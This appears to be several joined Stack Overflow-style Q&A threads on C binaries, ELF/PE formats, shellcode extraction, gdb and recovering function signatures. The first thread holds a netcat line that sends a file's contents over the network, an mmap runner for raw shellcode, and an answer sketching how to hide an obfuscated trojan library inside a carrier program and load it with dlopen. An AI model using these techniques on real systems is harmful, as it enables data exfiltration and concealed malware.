Edit: It appears I have a lot more reading to do...
Also, for those telling me this is a bad idea, it's for a buffer overflow exercise.
I have a fairly simple C program:
#include <stdlib.h>

int main(void) {
    system("cat file | nc -p 33 localhost 8080");
    return 0;
}
I want to turn it into hex assembly code. Think something like:
\x55\x43\xff\x75\x13\x77...
I tried doing:
gcc -o shell shell.c
for i in $(objdump -d shell -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
And that gave me a nice long string of hex. But when I tested it in this program, I got a segfault.
char code[] = "\x55\x43\xff\x75\x13\x77...";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;
    (*func)();
}
Anyone know how I can get this working? Thanks! Also, I don't know if it matters but it's a 64 bit system.
You are missing a whole bunch of stuff that the OS does for you between the time the binary code is loaded from disk and the time it is executed. Take the call to system(char *command) as an example: the pointer to the command characters, and the address of system() itself in the shared C library, are not valid until the OS loader has "fixed up" the pointers.
If you are very, very careful you can construct code that does not rely on such pointers and can run from any arbitrary address without help from the OS loader. This is how stack-overflow exploits are created. Most modern CPUs and operating systems prevent such code from running by having the memory manager mark pages as either data or code (the NX bit, a.k.a. DEP) and faulting if your program tries to execute data or write to code.
What you are trying to do, the OS is trying to prevent.
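If the goal is simply to test a blob of position-independent code, the usual workaround is to copy the bytes into a page you have explicitly asked the OS to make executable, rather than running them out of .data. A minimal sketch (Linux/POSIX; the payload bytes below are just a harmless placeholder, real self-contained machine code for your architecture would go there):

#define _DEFAULT_SOURCE
#include <string.h>
#include <sys/mman.h>

/* Placeholder bytes: nop; nop; ret on x86. */
static const unsigned char payload[] = "\x90\x90\xc3";

int main(void)
{
    /* Ask the kernel for an anonymous page that is readable, writable and
       executable, instead of relying on the .data section being executable. */
    void *buf = mmap(NULL, sizeof payload,
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return 1;

    memcpy(buf, payload, sizeof payload);

    /* Jump to the copied bytes. */
    ((void (*)(void))buf)();
    return 0;
}

On systems that enforce strict W^X you may have to map the page writable first and flip it to executable with mprotect() once the copy is done; and the bytes themselves must be genuinely position-independent, which is the point being made here.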
This won't work. The main reason: what your compiler creates is not just plain binary code but a well-defined file format for a runnable program (on Windows a PE file, on Linux an ELF file). This file is read by the dynamic linker of your operating system and preprocessed (e.g. linked against dynamic shared objects, i.e. libraries) before execution begins at the entry point given in the file's headers. There is no way such a file could be executed by just jumping to its first byte. In fact it's the linker that creates the output format, but it is invoked automatically by the compiler.
If you JUST want the assembler code, use gcc -S ... you will get mnemonics that could be fed to a standalone assembler.
There are ways to trick the linker into emitting a plain binary of your code (see, for example, write-ups on using that to generate an MS-DOS .COM file), but you still have the problem that your program typically doesn't consist of only the text section (that is, the binary code that is executed): you also have data, typically in a .data segment (initialized read-write data), a .rodata segment (read-only data) and a .bss segment (zero-initialized data).
Adding to that, placing the binary in a C string will normally put it in one of those data segments. Although such a segment could be executable, it doesn't have to be, and from a security point of view it shouldn't be -- see Data Execution Prevention.
All in all, just forget about that...
I'm not sure what you are trying to achieve, but if I put my black hat on for a minute...
If you are trying to write a stack overflow exploit, you need to learn about the memory manager and the gory details of the target CPU. You will be dealing strictly with the CPU and circumventing the OS entirely.
If you are trying to write a trojan horse, you should compile your payload as a dynamic library (.so) and put the hex for the entire payload.so file into code[]. Then, in the carrier program, map code[] to a virtual file (or just write it to disk) and call dlopen() (LoadLibrary() on Windows) on that file; a rough sketch follows below. You still won't be root, but your payload will be buried inside the first executable. You can bit-twiddle the code[] bytes to obfuscate the payload. You may also need to figure out how to set the executable flag on the newly created file.
For either of these, you will be working against the CPU and/or OS.
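A rough sketch of the dlopen() route described above, assuming the bytes of a real, separately compiled payload.so have been pasted into code[] (the array below is only a placeholder) and that the library exports a function named payload_entry (a name chosen here purely for illustration):

#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Placeholder: in a real carrier this would be the full payload.so image. */
static const unsigned char code[] = { 0x7f, 'E', 'L', 'F' /* ... */ };

int main(void)
{
    /* Write the embedded library image out to a file the loader can map. */
    const char *path = "/tmp/payload.so";
    FILE *f = fopen(path, "wb");
    if (!f)
        return 1;
    fwrite(code, 1, sizeof code, f);
    fclose(f);

    /* Load it and look up the (hypothetical) entry point. */
    void *handle = dlopen(path, RTLD_NOW);
    if (!handle) {
        fprintf(stderr, "dlopen: %s\n", dlerror());
        return 1;
    }
    void (*entry)(void) = (void (*)(void))dlsym(handle, "payload_entry");
    if (entry)
        entry();

    dlclose(handle);
    unlink(path);
    return 0;
}

Link the carrier with -ldl on glibc-based systems. This only works if code[] really is a complete, valid shared object for the target platform.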
I have a program called parser that I compiled with the -g flag. This is my makefile:
parser: header.h parser.c
	gcc -g header.h parser.c -o parser

clean:
	rm -f parser a.out
The code for one function in parser.c is:
int _find(char *html, struct html_tag **obj)
{
    char temp[strlen("<end") + 1];
    memcpy(temp, "<end", strlen("<end") + 1);
    ...
    return 0;
}
What I would like is this: when I debug parser and hit a breakpoint, can I also change lines of code while stepping (n) through the function above? If that is not gdb's job, is there an open-source tool that lets me actually edit the code, and possibly save it, so that the changed statement (for example, a different array index) takes effect before the next step executes? Can this be done in gdb, perhaps with some compile options?
I know I can assign values to variables at runtime in gdb, but is that it? Is there anything that actually lets me change the source as well?
Most C implementations are compiled. The source code is analyzed and translated to processor instructions. This translation would be difficult to do on a piecewise basis. That is, given some small change in the source code, it would be practically impossible to update the executable file to represent those changes. As part of the translation, the compiler transforms and intertwines statements, assigns processor registers to be used for computing parts of expressions, designates places in memory to hold data, and more. When source code is changed slightly, this may result in a new compilation happening to use a different register in one place or needing more or less memory in a particular function, which results in data moving back or forth. Merging these changes into the running program would require figuring out all the differences, moving things in memory, rearranging what is in what processor register, and so on. For practical purposes, these changes are impossible.
GDB does not support this.
(Apple’s developer tools may have some feature like this. I saw it demonstrated for the Swift programming language but have not used it.)
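For completeness, here is roughly what gdb does let you do at a breakpoint short of recompiling: change data, call functions that already exist in the binary, and redirect execution to another line of the already compiled code. A hypothetical session inside _find (the line number is made up):

(gdb) set var temp[0] = 'X'
(gdb) call strlen(temp)
(gdb) jump 25

None of this alters the compiled code itself; jump merely resumes execution at machine code that already exists, so the effect of an edited source line cannot be obtained this way.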
I am using Dev-C++, which compiles using GCC, on Windows 8.1, 64-bit.
I noticed that all my .c files always compiled to at least 128-kilobyte .exe files, no matter how small the source is. Even a simple "Hello, world!" was 128kb. Source files with more lines of code increased the size of the executable as I would expect, but all the files started off at at least 128kb, as if that's some sort of minimum size.
I know .exe's don't actually have a minimum size like that; .kkrieger is a full first-person shooter with 3d graphics and sound that all fit inside a single 96kb executable.
Trying to get to the bottom of this, I opened up my hello_world.exe in Notepad++. Perhaps my compiler adds a lengthy header that happens to be 128kb, I thought.
Unfortunately, I don't know enough about executables to be able to make sense of it, though I did find strings like "Address %p has no image-section VirtualQuery failed for %d bytes at address %p" buried among the usual garble of characters in an .exe.
Of course, this isn't a serious problem, but I'd like to know why it's happening.
Why is this 128kb minimum happening? Does it have something to do with my 64-bit OS, or perhaps with a quirk of my compiler?
Short answer: it depends.
Long answer: it depends on what operating system you have and how it handles executables.
Most compilers do not hand you raw x86/ARM/whatever machine code on its own. Instead, after they pack your source code into .o (object) files, they bring the .o files and their libraries together and "link" it all into a standard executable format. These "executable formats" are system-specific file formats that contain the actual machine code together with headers and other metadata the OS needs in order to load the program, set it up and hand those instructions to the CPU.
For example, I'll talk about the two most commonly used executable formats for Linux devices: ELF and ELF64 (I'll let you figure out what the namesake differences are yourself). ELF stands for Executable and Linkable Format. In every ELF-compiled program, the file starts off with a 4-byte "magic number", which is simply a hexadecimal 0x7F followed by the string "ELF" in ASCII. The next byte is set to either 1 or 2, which signifies that the program is for 32-bit or 64-bit architectures, respectively. And after that, another byte to signify the program's endianness. After that, there's a few more bytes that tell what the architecture is, and so on, until you reach a total of up to 64 bytes for the 64-bit header.
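If you want to see those header fields for yourself on a Linux machine, the binutils tools will decode them (./a.out here is just whatever ELF executable you have at hand):

$ readelf -h ./a.out     # decoded ELF header: class, endianness, entry point, ...
$ xxd -l 16 ./a.out      # the raw identification bytes, starting with 7f 45 4c 46 ("\x7fELF")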
However, 64 bytes is nowhere near the 128K you measured. That's because (aside from the fact that the Windows .exe format is usually much more complex) the C++ standard library is also at fault here. For instance, let's have a look at a common use of the C++ iostream library:
#include <iostream>

int main()
{
    std::cout << "Hello, World!" << std::endl;
    return 0;
}
This program may compile to a surprisingly large executable on a Windows system, because the moment you pull iostream into your program, the linker drags a large chunk of the C++ standard library in with it, which can increase your executable's size considerably.
So, how do we rectify this problem? Simple:
Use the C standard library implementation for C++!
#include <cstdio>

int main()
{
    printf("Hello, World!\n");
    return 0;
}
Simply using the original C standard library can decrease your size from a couple of hundred kilobytes to a handful at most. The reason is simply that GCC/G++ links a large part of the C++ standard library into the program the moment you use it.
However, sometimes you absolutely need the C++-specific libraries. In that case, a lot of toolchains have a command-line option that essentially tells the linker "Hey, I'm only using like, 2 functions from the C++ standard library, you don't need the whole thing". With GCC this is the -nodefaultlibs (or -nostdlib) driver option; I'm not entirely sure what the equivalent is on Windows. Of course, this can very quickly break a TON of calls in programs that make heavy use of the standard C++ library.
So, in the end, I would worry more about simply rewriting your program to use the plain C functions instead of the new-fangled C++ functions, as amazing as they are, if size is what you're worried about.
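A couple of toolchain switches are also worth trying before rewriting anything; how much they save depends on your particular MinGW/GCC setup, so treat the commands below as things to experiment with rather than guaranteed fixes:

$ gcc -Os -s hello.c -o hello.exe    # optimize for size and strip symbols while linking
$ strip hello.exe                    # or strip an already-built executable afterwards
$ size hello.exe                     # see how large the text/data/bss sections really are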
I want to compile my C file with clang and then disassemble it with ndisasm (for educational purposes). However, ndisasm says in its manual that it only works with binary and not executable files:
ndisasm only disassembles binary files: it has
no understanding of the header information
present in object or executable files. If you
want to disassemble an object file, you should
probably be using objdump(1).
What's the difference, exactly? And what does clang output when I run it with a simple C file, an executable or a binary?
An object file contains machine-language code plus all sorts of other information: headers, symbol tables, relocations. ndisasm wants just the machine code, not the other stuff. So the message is telling you to use the objdump utility, which understands those headers, instead; or to extract just the machine-code section(s) from the file (objcopy can do that) and then run ndisasm on the result.
And what does clang output when I run it with a simple C file, an executable or a binary?
A C toolchain is usually able to create a 'raw' binary, which is Just The Code, hold the tomato, because for some (rare!) purposes that can be useful. Think, for instance, of boot sectors (which cannot 'load' an executable the regular way, because the OS that would load them has not started yet) and of programmable ROM chips. An operating system itself usually does not like to execute 'raw binary code', pretty much for the same reasons. An exception is MS Windows, which can still run old-format .com binaries.
By default, clang will create an executable. The intermediate files, called object files, are usually deleted after the executable is linked (glued together with library functions and an appropriate executable header). To get just a .o object file, use the -c switch.
Note that Object files also contain a header. After all, the linker needs to know what the file contains before it can link it to other parts.
For educational purposes, you may want to examine the object file format. Armed with that knowledge it should be possible to write a program that can tell you at what offset in the file the actual code starts. Then you can feed that information into ndisasm.
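If you'd rather not parse the header format yourself, binutils' objcopy can extract just the machine code of a section into a flat binary that ndisasm will accept (the section name .text and the 64-bit flag below are the usual defaults; adjust for your target):

$ clang -c hello.c -o hello.o
$ objcopy -O binary --only-section=.text hello.o text.bin
$ ndisasm -b 64 text.bin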
In addition to the header, files may contain even more data after the instructions. Again, ndisasm does not know and nor does it care. If your test program contains a string Hello world! somewhere at the end, it will happily try to disassemble that as well. It's up to you to recognize this garbage as such, and ignore what ndisasm does to it.
I just wrote a Hello World program in C that I was playing around with. I'd like to try to dump the binary from memory (using gdb) and create another executable from it. I tried dumping the page with executable privileges followed by its data page; however, the result segfaults. Are there any approaches to doing this? Is there any way I can debug and find out why it crashes? Any generic suggestions at all?
Thanks.
[EDIT]
It's on Linux and I've tried it on both 32- and 64-bit x86. The kernel version is 3.13. I set a breakpoint on _start, dumped the executable page followed by its data page to a file, and tried executing it.
Wait, are you just dumping the mapped text (executable) section followed by the mapped data section to a file? That by itself isn't a valid ELF object; an ELF file needs an ELF header as well. I'm surprised the OS even let you attempt to execute it; you should have gotten an error about an invalid ELF header or something like that.
In addition to the header, an ELF file contains many more sections that are important to be able to run it.
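A quick sanity check is to look for the four ELF identification bytes at the start of your dump; every file the kernel will exec as ELF has to begin with them. A small sketch (the file to check is passed on the command line):

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }

    FILE *f = fopen(argv[1], "rb");
    if (!f) {
        perror("fopen");
        return 1;
    }

    unsigned char ident[4];
    size_t n = fread(ident, 1, sizeof ident, f);
    fclose(f);

    /* A loadable ELF file must start with 0x7f 'E' 'L' 'F'. */
    if (n == sizeof ident && memcmp(ident, "\x7f" "ELF", 4) == 0)
        puts("starts with an ELF header");
    else
        puts("no ELF magic here - the kernel will refuse to execute this");
    return 0;
}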
As for debugging, I'd start with GDB to see where it crashes. Does your program crash, or does the dynamic linker crash when trying to load your program? If the dynamic linker crashes, try debugging that, e.g. with
gdb --args /lib64/ld-2.18.so <your program>
Attempts to re-create ELF files from memory have been done before - have a look at Statifier, which even statically includes all loaded dynamic libraries into the resulting ELF.
It might not be very simple, and it is certainly processor- and operating-system-specific.
You could look at the Emacs source file unexec.c, which does what you want. See this answer.
The title is clear: we can load a library with dl_open etc., but how can I get the signatures of the functions in it?
This question cannot be answered in general. Technically, if you compiled your executable with exhaustive debugging information (the code may still be an optimized release build), then the executable will contain extra sections providing some kind of reflectivity of the binary. On *nix systems (you referred to dl_open) this is implemented through DWARF debugging data in extra sections of the ELF binary. It works similarly for Mach-O universal binaries on Mac OS X.
Windows PEs, however, use a completely different format, so unfortunately DWARF is not truly cross-platform. (Actually, in the early development stages of my 3D engine I implemented an ELF/DWARF loader for Windows, so that I could use a common format for the engine's various modules; with some serious effort such a thing can be done.)
If you don't want to go into implementing your own loaders or debugging-information accessors, you may embed the reflection information through some extra exported symbols (following some standard naming scheme) which refer to a table of function names mapped to their signatures. For C source files, writing a parser to extract that information from the source itself is rather trivial. C++, on the other hand, is so notoriously difficult to parse correctly that you need a fully fledged compiler to get it right. For this purpose GCCXML was developed: technically a GCC build that emits the AST in XML form instead of an object binary. The emitted XML is then much easier to parse.
From the extracted information, create a source file with some kind of linked-list/array/etc. structure describing each function. If you don't directly export each function's symbol but instead initialize a field in the reflection structure with the function pointer, you get a really nice and clean annotated exporting scheme (sketched below). Technically you could place this information in a separate section of the binary as well, but putting it in the read-only data section does the job just as well.
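A minimal sketch of such an exporting scheme for a plain C library; the name plugin_exports and the signature strings are just a convention invented here for illustration, not something the dynamic loader knows about:

/* Inside the shared library: describe every exported function next to its address. */
typedef struct {
    const char *name;       /* function name */
    const char *signature;  /* human/tool-readable description of the prototype */
    void       *fn;         /* the function pointer itself */
} export_entry;

static int add(int a, int b)            { return a + b; }
static double scale(double x, double s) { return x * s; }

/* The one symbol a host program looks up with dlsym(). */
const export_entry plugin_exports[] = {
    { "add",   "int (int, int)",          (void *)add },
    { "scale", "double (double, double)", (void *)scale },
    { 0, 0, 0 }  /* terminator */
};

The host dlopen()s the library, dlsym()s plugin_exports and walks the array; the signature strings carry exactly the information that the symbol table alone cannot.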
However, if you're given a 3rd-party binary – say, worst case, compiled from C source with no debugging information and all symbols that are not externally referenced stripped – you're pretty much screwed. The best you could do is apply some binary analysis of the way the function accesses the various places in which parameters can be passed.
This will only tell you the number of parameters and the size of each parameter value, but not the types or names/meanings. When reverse engineering a program (e.g. for malware analysis or a security audit), identifying the type and meaning of the parameters passed to functions is one of the major efforts. Recently I came across a driver I had to reverse for debugging purposes, and I was astounded to find C++ symbols in a Linux kernel module (you can't use C++ in the Linux kernel in a sane way), but also relieved, because the C++ name mangling provided me with plenty of information.
On Linux (or Mac) you can use a combination of "nm" and "c++filt" (for C++ libraries)
nm mylibrary.so | c++filt
or
nm mylibrary.a | c++filt
"nm" will give you the mangled form and "c++filt" attempts to put them in a more human-readable format. You might want to use some options in nm to filter down the results, especially if the library is large (or you can "grep" the final output to find a particular item)
No, this is not possible. The signature of a function doesn't mean anything at runtime; it's a piece of information used at compile time by the compiler to validate your program.
You can't. Either the library publishes a public API in a header, or you need to know the signature by some other means.
At the machine level, the parameters of a function depend on how many stack arguments in the stack frame you consider to belong to the call and how you interpret them. Therefore, once the function has been compiled into object code, it is not possible to recover the signature like that. One remote possibility is to disassemble the code and read how the function works to infer the number of parameters, but the types would still be difficult or impossible to determine. In a word, it is not possible.
This information is not available. Not even the debugger knows:
$ cat foo.c
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[])
{
char foo[10] = { 0 };
char bar[10] = { 0 };
printf("%s\n", "foo");
memcpy(bar, foo, sizeof(foo));
return 0;
}
$ gcc -g -o foo foo.c
$ gdb foo
Reading symbols from foo...done.
(gdb) b main
Breakpoint 1 at 0x4005f3: file foo.c, line 5.
(gdb) r
Starting program: foo
Breakpoint 1, main (argc=1, argv=0x7fffffffe3e8) at foo.c:5
5 {
(gdb) ptype printf
type = int ()
(gdb) ptype memcpy
type = int ()
(gdb)